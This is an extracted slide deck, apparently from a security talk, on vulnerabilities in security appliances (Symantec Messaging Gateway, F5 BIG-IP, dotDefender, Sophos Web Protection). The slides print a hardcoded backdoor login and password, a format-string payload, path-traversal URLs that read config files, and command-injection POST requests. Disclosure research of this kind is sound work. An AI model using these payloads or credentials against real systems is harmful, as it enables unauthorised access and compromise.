3. 3
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
4. 4
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
(in)Security Software
6. The answer
• Symantec Messaging Gateway
– Backdoor by design
Code execution
• F5 BIG-IP
– SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
– Format string vulnerability
Code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
6
(in)Security Software
7. The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
7
(in)Security Software
8. The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
8
(in)Security Software
9. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
9
(in)Security Software
10. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
10
(in)Security Software
11. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
11
(in)Security Software
12. The answer
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php
12
F5 BIG-IP <= 11.2.0
(in)Security Software
13. The answer
“... dotDefender is a web application security
solution (a Web Application Firewall, or WAF)
that offers strong, proactive security for your
websites and web applications ...“
Web Attack?
13
AppliCure dotDefender WAF <= 4.26
(in)Security Software
14. 14
The answer
• %MAILTO_BLOCK% - email entered in the “Email
address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
Looks nice…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
15. 15
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
16. 16
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
17. 17
The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8
d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101
Firefox/19.0"
Passwords!
(in)Security Software
18. 18
The answer
` POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget§ion=configuration&STYLE=<validsessid>&url=%60sle
ep%205%60
Diagnostic Tools
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
20. 20
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
21. 21
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
23. 23
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
24. Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Applicaton testing and Fuzzing
– Reverse engineering
– Source code analysis
• A short note on so called “security scanning”
tools
24
(in)Security Software
25. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
25
(in)Security Software
26. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
26
(in)Security Software
27. Vuln, where art thou?
*Move two matches to make it three equal squares
27
(in)Security Software
28. Vuln, where art thou?
*Move two matches to make it three equal squares
28
(in)Security Software
29. 29
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
30. 30
Sometimes it’s easier to find the vulnerability
than it might be expected . . .
*doesn’t exist yet
And now for something completely different
(in)Security Software